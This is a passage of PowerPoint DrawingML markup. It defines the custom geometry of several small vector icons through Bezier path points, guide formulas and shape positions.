                    <a:pt x="31" y="13"/>
                    <a:pt x="32" y="13"/>
                    <a:pt x="33" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="13"/>
                    <a:pt x="36" y="13"/>
                    <a:pt x="36" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="12"/>
                    <a:pt x="37" y="12"/>
                    <a:pt x="37" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="12"/>
                    <a:pt x="37" y="13"/>
                    <a:pt x="37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6" y="17"/>
                    <a:pt x="35" y="17"/>
                    <a:pt x="34" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33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8"/>
                    <a:pt x="32" y="19"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="21"/>
                    <a:pt x="32" y="21"/>
                    <a:pt x="32" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="22"/>
                    <a:pt x="35" y="21"/>
                    <a:pt x="36" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="21"/>
                    <a:pt x="38" y="21"/>
                    <a:pt x="39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5"/>
                    <a:pt x="41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8" y="25"/>
                    <a:pt x="37" y="25"/>
                    <a:pt x="36" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="25"/>
                    <a:pt x="34" y="25"/>
                    <a:pt x="33" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="26"/>
                    <a:pt x="34" y="27"/>
                    <a:pt x="34" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="29"/>
                    <a:pt x="36" y="29"/>
                    <a:pt x="37" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="31"/>
                    <a:pt x="39" y="32"/>
                    <a:pt x="40" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="32"/>
                    <a:pt x="41" y="33"/>
                    <a:pt x="41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4"/>
                    <a:pt x="42" y="34"/>
                    <a:pt x="41" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="35"/>
                    <a:pt x="40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6" y="35"/>
                    <a:pt x="35" y="34"/>
                    <a:pt x="34" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="33"/>
                    <a:pt x="33" y="32"/>
                    <a:pt x="33" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="31"/>
                    <a:pt x="32" y="30"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="31"/>
                    <a:pt x="29" y="33"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="36"/>
                    <a:pt x="25" y="36"/>
                    <a:pt x="24" y="37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7"/>
                    <a:pt x="21" y="37"/>
                    <a:pt x="20" y="36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5"/>
                    <a:pt x="19" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="34"/>
                    <a:pt x="22" y="33"/>
                    <a:pt x="23" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="32"/>
                    <a:pt x="27" y="30"/>
                    <a:pt x="27" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="28"/>
                    <a:pt x="28" y="27"/>
                    <a:pt x="28" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="27"/>
                    <a:pt x="28" y="26"/>
                    <a:pt x="28" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="26"/>
                    <a:pt x="25" y="26"/>
                    <a:pt x="24" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="26"/>
                    <a:pt x="22" y="26"/>
                    <a:pt x="21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6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2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2" y="22"/>
                    <a:pt x="23" y="22"/>
                    <a:pt x="25" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="22"/>
                    <a:pt x="27" y="22"/>
                    <a:pt x="28" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="21"/>
                    <a:pt x="28" y="21"/>
                    <a:pt x="28" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="19"/>
                    <a:pt x="28" y="19"/>
                    <a:pt x="28" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="18"/>
                    <a:pt x="28" y="17"/>
                    <a:pt x="28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20"/>
                    <a:pt x="24" y="21"/>
                    <a:pt x="24" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="21"/>
                    <a:pt x="23" y="21"/>
                    <a:pt x="23" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="21"/>
                    <a:pt x="22" y="21"/>
                    <a:pt x="21" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="20"/>
                    <a:pt x="20" y="20"/>
                    <a:pt x="20" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="19"/>
                    <a:pt x="21" y="19"/>
                    <a:pt x="21" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="17"/>
                    <a:pt x="22" y="16"/>
                    <a:pt x="23" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="13"/>
                    <a:pt x="24" y="11"/>
                    <a:pt x="24" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="11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10"/>
                    <a:pt x="26" y="10"/>
                    <a:pt x="27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7" y="13"/>
                    <a:pt x="27" y="13"/>
                    <a:pt x="27" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="3"/>
                    <a:pt x="24" y="3"/>
                    <a:pt x="24" y="3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3" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21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2"/>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="5"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="19" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="9"/>
                    <a:pt x="18" y="10"/>
                    <a:pt x="17" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="12"/>
                    <a:pt x="16" y="13"/>
                    <a:pt x="16" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="14"/>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="15"/>
                    <a:pt x="19" y="15"/>
                    <a:pt x="20" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="15"/>
                    <a:pt x="20" y="14"/>
                    <a:pt x="21" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="11"/>
                    <a:pt x="22" y="10"/>
                    <a:pt x="23" y="9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8"/>
                    <a:pt x="26" y="8"/>
                    <a:pt x="27" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="8"/>
                    <a:pt x="29" y="7"/>
                    <a:pt x="30" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="7"/>
                    <a:pt x="32" y="7"/>
                    <a:pt x="34" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="7"/>
                    <a:pt x="37" y="7"/>
                    <a:pt x="37" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="7"/>
                    <a:pt x="38" y="7"/>
                    <a:pt x="38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5" y="3"/>
                    <a:pt x="34" y="3"/>
                    <a:pt x="33" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="3"/>
                    <a:pt x="31" y="3"/>
                    <a:pt x="30" y="4"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2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ṥļidè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4158820" y="4044128"/>
              <a:ext cx="136334" cy="132244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 19 w 42"/>
                <a:gd name="T1" fmla="*/ 11 h 41"/>
                <a:gd name="T2" fmla="*/ 25 w 42"/>
                <a:gd name="T3" fmla="*/ 9 h 41"/>
                <a:gd name="T4" fmla="*/ 34 w 42"/>
                <a:gd name="T5" fmla="*/ 6 h 41"/>
                <a:gd name="T6" fmla="*/ 34 w 42"/>
                <a:gd name="T7" fmla="*/ 6 h 41"/>
                <a:gd name="T8" fmla="*/ 35 w 42"/>
                <a:gd name="T9" fmla="*/ 6 h 41"/>
                <a:gd name="T10" fmla="*/ 35 w 42"/>
                <a:gd name="T11" fmla="*/ 6 h 41"/>
                <a:gd name="T12" fmla="*/ 36 w 42"/>
                <a:gd name="T13" fmla="*/ 10 h 41"/>
                <a:gd name="T14" fmla="*/ 36 w 42"/>
                <a:gd name="T15" fmla="*/ 10 h 41"/>
                <a:gd name="T16" fmla="*/ 35 w 42"/>
                <a:gd name="T17" fmla="*/ 10 h 41"/>
                <a:gd name="T18" fmla="*/ 28 w 42"/>
                <a:gd name="T19" fmla="*/ 12 h 41"/>
                <a:gd name="T20" fmla="*/ 21 w 42"/>
                <a:gd name="T21" fmla="*/ 14 h 41"/>
                <a:gd name="T22" fmla="*/ 24 w 42"/>
                <a:gd name="T23" fmla="*/ 19 h 41"/>
                <a:gd name="T24" fmla="*/ 28 w 42"/>
                <a:gd name="T25" fmla="*/ 22 h 41"/>
                <a:gd name="T26" fmla="*/ 34 w 42"/>
                <a:gd name="T27" fmla="*/ 25 h 41"/>
                <a:gd name="T28" fmla="*/ 39 w 42"/>
                <a:gd name="T29" fmla="*/ 27 h 41"/>
                <a:gd name="T30" fmla="*/ 42 w 42"/>
                <a:gd name="T31" fmla="*/ 27 h 41"/>
                <a:gd name="T32" fmla="*/ 42 w 42"/>
                <a:gd name="T33" fmla="*/ 29 h 41"/>
                <a:gd name="T34" fmla="*/ 40 w 42"/>
                <a:gd name="T35" fmla="*/ 32 h 41"/>
                <a:gd name="T36" fmla="*/ 37 w 42"/>
                <a:gd name="T37" fmla="*/ 31 h 41"/>
                <a:gd name="T38" fmla="*/ 31 w 42"/>
                <a:gd name="T39" fmla="*/ 29 h 41"/>
                <a:gd name="T40" fmla="*/ 24 w 42"/>
                <a:gd name="T41" fmla="*/ 25 h 41"/>
                <a:gd name="T42" fmla="*/ 22 w 42"/>
                <a:gd name="T43" fmla="*/ 23 h 41"/>
                <a:gd name="T44" fmla="*/ 20 w 42"/>
                <a:gd name="T45" fmla="*/ 20 h 41"/>
                <a:gd name="T46" fmla="*/ 20 w 42"/>
                <a:gd name="T47" fmla="*/ 21 h 41"/>
                <a:gd name="T48" fmla="*/ 17 w 42"/>
                <a:gd name="T49" fmla="*/ 32 h 41"/>
                <a:gd name="T50" fmla="*/ 12 w 42"/>
                <a:gd name="T51" fmla="*/ 39 h 41"/>
                <a:gd name="T52" fmla="*/ 10 w 42"/>
                <a:gd name="T53" fmla="*/ 41 h 41"/>
                <a:gd name="T54" fmla="*/ 7 w 42"/>
                <a:gd name="T55" fmla="*/ 40 h 41"/>
                <a:gd name="T56" fmla="*/ 6 w 42"/>
                <a:gd name="T57" fmla="*/ 38 h 41"/>
                <a:gd name="T58" fmla="*/ 6 w 42"/>
                <a:gd name="T59" fmla="*/ 38 h 41"/>
                <a:gd name="T60" fmla="*/ 8 w 42"/>
                <a:gd name="T61" fmla="*/ 36 h 41"/>
                <a:gd name="T62" fmla="*/ 13 w 42"/>
                <a:gd name="T63" fmla="*/ 30 h 41"/>
                <a:gd name="T64" fmla="*/ 16 w 42"/>
                <a:gd name="T65" fmla="*/ 20 h 41"/>
                <a:gd name="T66" fmla="*/ 16 w 42"/>
                <a:gd name="T67" fmla="*/ 16 h 41"/>
                <a:gd name="T68" fmla="*/ 2 w 42"/>
                <a:gd name="T69" fmla="*/ 20 h 41"/>
                <a:gd name="T70" fmla="*/ 2 w 42"/>
                <a:gd name="T71" fmla="*/ 20 h 41"/>
                <a:gd name="T72" fmla="*/ 1 w 42"/>
                <a:gd name="T73" fmla="*/ 20 h 41"/>
                <a:gd name="T74" fmla="*/ 0 w 42"/>
                <a:gd name="T75" fmla="*/ 17 h 41"/>
                <a:gd name="T76" fmla="*/ 1 w 42"/>
                <a:gd name="T77" fmla="*/ 16 h 41"/>
                <a:gd name="T78" fmla="*/ 1 w 42"/>
                <a:gd name="T79" fmla="*/ 16 h 41"/>
                <a:gd name="T80" fmla="*/ 15 w 42"/>
                <a:gd name="T81" fmla="*/ 12 h 41"/>
                <a:gd name="T82" fmla="*/ 14 w 42"/>
                <a:gd name="T83" fmla="*/ 8 h 41"/>
                <a:gd name="T84" fmla="*/ 13 w 42"/>
                <a:gd name="T85" fmla="*/ 5 h 41"/>
                <a:gd name="T86" fmla="*/ 13 w 42"/>
                <a:gd name="T87" fmla="*/ 4 h 41"/>
                <a:gd name="T88" fmla="*/ 13 w 42"/>
                <a:gd name="T89" fmla="*/ 3 h 41"/>
                <a:gd name="T90" fmla="*/ 12 w 42"/>
                <a:gd name="T91" fmla="*/ 2 h 41"/>
                <a:gd name="T92" fmla="*/ 12 w 42"/>
                <a:gd name="T93" fmla="*/ 2 h 41"/>
                <a:gd name="T94" fmla="*/ 12 w 42"/>
                <a:gd name="T95" fmla="*/ 1 h 41"/>
                <a:gd name="T96" fmla="*/ 13 w 42"/>
                <a:gd name="T97" fmla="*/ 1 h 41"/>
                <a:gd name="T98" fmla="*/ 13 w 42"/>
                <a:gd name="T99" fmla="*/ 1 h 41"/>
                <a:gd name="T100" fmla="*/ 16 w 42"/>
                <a:gd name="T101" fmla="*/ 0 h 41"/>
                <a:gd name="T102" fmla="*/ 17 w 42"/>
                <a:gd name="T103" fmla="*/ 0 h 41"/>
                <a:gd name="T104" fmla="*/ 17 w 42"/>
                <a:gd name="T105" fmla="*/ 1 h 41"/>
                <a:gd name="T106" fmla="*/ 17 w 42"/>
                <a:gd name="T107" fmla="*/ 2 h 41"/>
                <a:gd name="T108" fmla="*/ 18 w 42"/>
                <a:gd name="T109" fmla="*/ 4 h 41"/>
                <a:gd name="T110" fmla="*/ 19 w 42"/>
                <a:gd name="T111" fmla="*/ 1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2" h="41">
                  <a:moveTo>
                    <a:pt x="19" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="10"/>
                    <a:pt x="23" y="10"/>
                    <a:pt x="25" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="7"/>
                    <a:pt x="33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4" y="11"/>
                    <a:pt x="31" y="11"/>
                    <a:pt x="28" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="13"/>
                    <a:pt x="22" y="14"/>
                    <a:pt x="21" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="16"/>
                    <a:pt x="23" y="18"/>
                    <a:pt x="24" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="20"/>
                    <a:pt x="26" y="21"/>
                    <a:pt x="28" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="23"/>
                    <a:pt x="31" y="24"/>
                    <a:pt x="34" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="26"/>
                    <a:pt x="37" y="26"/>
                    <a:pt x="39" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="27"/>
                    <a:pt x="41" y="27"/>
                    <a:pt x="42" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="28"/>
                    <a:pt x="42" y="28"/>
                    <a:pt x="42" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="30"/>
                    <a:pt x="41" y="31"/>
                    <a:pt x="40" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="32"/>
                    <a:pt x="39" y="32"/>
                    <a:pt x="37" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="31"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="28"/>
                    <a:pt x="26" y="27"/>
                    <a:pt x="24" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="24"/>
                    <a:pt x="23" y="23"/>
                    <a:pt x="22" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="22"/>
                    <a:pt x="21" y="21"/>
                    <a:pt x="20" y="20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5"/>
                    <a:pt x="19" y="29"/>
                    <a:pt x="17" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="35"/>
                    <a:pt x="14" y="37"/>
                    <a:pt x="12" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="41"/>
                    <a:pt x="10" y="41"/>
                    <a:pt x="10" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="41"/>
                    <a:pt x="8" y="40"/>
                    <a:pt x="7" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="39"/>
                    <a:pt x="6" y="39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7" y="37"/>
                    <a:pt x="8" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="34"/>
                    <a:pt x="12" y="32"/>
                    <a:pt x="13" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="27"/>
                    <a:pt x="16" y="24"/>
                    <a:pt x="16" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="19"/>
                    <a:pt x="16" y="17"/>
                    <a:pt x="16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2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1"/>
                    <a:pt x="15" y="9"/>
                    <a:pt x="14" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="7"/>
                    <a:pt x="14" y="6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1"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="17" y="2"/>
                    <a:pt x="17" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="2"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="7"/>
                    <a:pt x="19" y="9"/>
                    <a:pt x="1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ŝ1ïďè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4295154" y="3975961"/>
              <a:ext cx="132244" cy="133607"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 41"/>
                <a:gd name="T1" fmla="*/ 16 h 41"/>
                <a:gd name="T2" fmla="*/ 3 w 41"/>
                <a:gd name="T3" fmla="*/ 17 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 41"/>
                <a:gd name="T5" fmla="*/ 14 h 41"/>
                <a:gd name="T6" fmla="*/ 2 w 41"/>
                <a:gd name="T7" fmla="*/ 11 h 41"/>
                <a:gd name="T8" fmla="*/ 7 w 41"/>
                <a:gd name="T9" fmla="*/ 13 h 41"/>
                <a:gd name="T10" fmla="*/ 16 w 41"/>
                <a:gd name="T11" fmla="*/ 10 h 41"/>
                <a:gd name="T12" fmla="*/ 11 w 41"/>
                <a:gd name="T13" fmla="*/ 5 h 41"/>
                <a:gd name="T14" fmla="*/ 9 w 41"/>
                <a:gd name="T15" fmla="*/ 6 h 41"/>
                <a:gd name="T16" fmla="*/ 8 w 41"/>
                <a:gd name="T17" fmla="*/ 8 h 41"/>
                <a:gd name="T18" fmla="*/ 13 w 41"/>
                <a:gd name="T19" fmla="*/ 12 h 41"/>
                <a:gd name="T20" fmla="*/ 16 w 41"/>
                <a:gd name="T21" fmla="*/ 10 h 41"/>
                <a:gd name="T22" fmla="*/ 2 w 41"/>
                <a:gd name="T23" fmla="*/ 21 h 41"/>
                <a:gd name="T24" fmla="*/ 0 w 41"/>
                <a:gd name="T25" fmla="*/ 23 h 41"/>
                <a:gd name="T26" fmla="*/ 4 w 41"/>
                <a:gd name="T27" fmla="*/ 30 h 41"/>
                <a:gd name="T28" fmla="*/ 6 w 41"/>
                <a:gd name="T29" fmla="*/ 29 h 41"/>
                <a:gd name="T30" fmla="*/ 7 w 41"/>
                <a:gd name="T31" fmla="*/ 28 h 41"/>
                <a:gd name="T32" fmla="*/ 5 w 41"/>
                <a:gd name="T33" fmla="*/ 24 h 41"/>
                <a:gd name="T34" fmla="*/ 32 w 41"/>
                <a:gd name="T35" fmla="*/ 15 h 41"/>
                <a:gd name="T36" fmla="*/ 36 w 41"/>
                <a:gd name="T37" fmla="*/ 14 h 41"/>
                <a:gd name="T38" fmla="*/ 34 w 41"/>
                <a:gd name="T39" fmla="*/ 10 h 41"/>
                <a:gd name="T40" fmla="*/ 32 w 41"/>
                <a:gd name="T41" fmla="*/ 6 h 41"/>
                <a:gd name="T42" fmla="*/ 25 w 41"/>
                <a:gd name="T43" fmla="*/ 1 h 41"/>
                <a:gd name="T44" fmla="*/ 25 w 41"/>
                <a:gd name="T45" fmla="*/ 2 h 41"/>
                <a:gd name="T46" fmla="*/ 24 w 41"/>
                <a:gd name="T47" fmla="*/ 9 h 41"/>
                <a:gd name="T48" fmla="*/ 19 w 41"/>
                <a:gd name="T49" fmla="*/ 10 h 41"/>
                <a:gd name="T50" fmla="*/ 20 w 41"/>
                <a:gd name="T51" fmla="*/ 6 h 41"/>
                <a:gd name="T52" fmla="*/ 20 w 41"/>
                <a:gd name="T53" fmla="*/ 2 h 41"/>
                <a:gd name="T54" fmla="*/ 20 w 41"/>
                <a:gd name="T55" fmla="*/ 0 h 41"/>
                <a:gd name="T56" fmla="*/ 25 w 41"/>
                <a:gd name="T57" fmla="*/ 1 h 41"/>
                <a:gd name="T58" fmla="*/ 23 w 41"/>
                <a:gd name="T59" fmla="*/ 27 h 41"/>
                <a:gd name="T60" fmla="*/ 22 w 41"/>
                <a:gd name="T61" fmla="*/ 29 h 41"/>
                <a:gd name="T62" fmla="*/ 22 w 41"/>
                <a:gd name="T63" fmla="*/ 30 h 41"/>
                <a:gd name="T64" fmla="*/ 8 w 41"/>
                <a:gd name="T65" fmla="*/ 37 h 41"/>
                <a:gd name="T66" fmla="*/ 7 w 41"/>
                <a:gd name="T67" fmla="*/ 37 h 41"/>
                <a:gd name="T68" fmla="*/ 9 w 41"/>
                <a:gd name="T69" fmla="*/ 40 h 41"/>
                <a:gd name="T70" fmla="*/ 17 w 41"/>
                <a:gd name="T71" fmla="*/ 36 h 41"/>
                <a:gd name="T72" fmla="*/ 24 w 41"/>
                <a:gd name="T73" fmla="*/ 34 h 41"/>
                <a:gd name="T74" fmla="*/ 25 w 41"/>
                <a:gd name="T75" fmla="*/ 36 h 41"/>
                <a:gd name="T76" fmla="*/ 25 w 41"/>
                <a:gd name="T77" fmla="*/ 38 h 41"/>
                <a:gd name="T78" fmla="*/ 23 w 41"/>
                <a:gd name="T79" fmla="*/ 38 h 41"/>
                <a:gd name="T80" fmla="*/ 23 w 41"/>
                <a:gd name="T81" fmla="*/ 39 h 41"/>
                <a:gd name="T82" fmla="*/ 26 w 41"/>
                <a:gd name="T83" fmla="*/ 40 h 41"/>
                <a:gd name="T84" fmla="*/ 29 w 41"/>
                <a:gd name="T85" fmla="*/ 38 h 41"/>
                <a:gd name="T86" fmla="*/ 29 w 41"/>
                <a:gd name="T87" fmla="*/ 35 h 41"/>
                <a:gd name="T88" fmla="*/ 40 w 41"/>
                <a:gd name="T89" fmla="*/ 24 h 41"/>
                <a:gd name="T90" fmla="*/ 41 w 41"/>
                <a:gd name="T91" fmla="*/ 24 h 41"/>
                <a:gd name="T92" fmla="*/ 40 w 41"/>
                <a:gd name="T93" fmla="*/ 21 h 41"/>
                <a:gd name="T94" fmla="*/ 39 w 41"/>
                <a:gd name="T95" fmla="*/ 21 h 41"/>
                <a:gd name="T96" fmla="*/ 26 w 41"/>
                <a:gd name="T97" fmla="*/ 27 h 41"/>
                <a:gd name="T98" fmla="*/ 30 w 41"/>
                <a:gd name="T99" fmla="*/ 18 h 41"/>
                <a:gd name="T100" fmla="*/ 28 w 41"/>
                <a:gd name="T101" fmla="*/ 16 h 41"/>
                <a:gd name="T102" fmla="*/ 27 w 41"/>
                <a:gd name="T103" fmla="*/ 17 h 41"/>
                <a:gd name="T104" fmla="*/ 22 w 41"/>
                <a:gd name="T105" fmla="*/ 20 h 41"/>
                <a:gd name="T106" fmla="*/ 13 w 41"/>
                <a:gd name="T107" fmla="*/ 24 h 41"/>
                <a:gd name="T108" fmla="*/ 9 w 41"/>
                <a:gd name="T109" fmla="*/ 27 h 41"/>
                <a:gd name="T110" fmla="*/ 11 w 41"/>
                <a:gd name="T111" fmla="*/ 30 h 41"/>
                <a:gd name="T112" fmla="*/ 14 w 41"/>
                <a:gd name="T113" fmla="*/ 27 h 41"/>
                <a:gd name="T114" fmla="*/ 25 w 41"/>
                <a:gd name="T115" fmla="*/ 2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1" h="41">
                  <a:moveTo>
                    <a:pt x="8" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="15"/>
                    <a:pt x="8" y="16"/>
                    <a:pt x="7" y="16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8"/>
                    <a:pt x="4" y="17"/>
                    <a:pt x="3" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="16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3"/>
                    <a:pt x="1" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="12"/>
                    <a:pt x="2" y="11"/>
                    <a:pt x="2" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="11"/>
                    <a:pt x="2" y="11"/>
                    <a:pt x="3" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="11"/>
                    <a:pt x="5" y="12"/>
                    <a:pt x="7" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="14"/>
                    <a:pt x="9" y="15"/>
                    <a:pt x="8" y="15"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="10"/>
                    <a:pt x="16" y="9"/>
                    <a:pt x="15" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="7"/>
                    <a:pt x="13" y="6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0" y="6"/>
                    <a:pt x="9" y="6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9"/>
                    <a:pt x="10" y="10"/>
                    <a:pt x="11" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="12"/>
                    <a:pt x="13" y="13"/>
                    <a:pt x="13" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="12"/>
                    <a:pt x="14" y="12"/>
                    <a:pt x="15" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="11"/>
                    <a:pt x="16" y="10"/>
                    <a:pt x="16" y="10"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29" y="8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2" y="27"/>
                    <a:pt x="3" y="29"/>
                    <a:pt x="3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5" y="30"/>
                    <a:pt x="5" y="30"/>
                    <a:pt x="6" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="29"/>
                    <a:pt x="7" y="29"/>
                    <a:pt x="7" y="29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6"/>
                    <a:pt x="33" y="16"/>
                    <a:pt x="33" y="16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4"/>
                    <a:pt x="36" y="14"/>
                    <a:pt x="36" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="13"/>
                    <a:pt x="35" y="12"/>
                    <a:pt x="34" y="10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9" y="8"/>
                    <a:pt x="29" y="8"/>
                    <a:pt x="29" y="8"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="1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2"/>
                    <a:pt x="25" y="2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7"/>
                    <a:pt x="24" y="8"/>
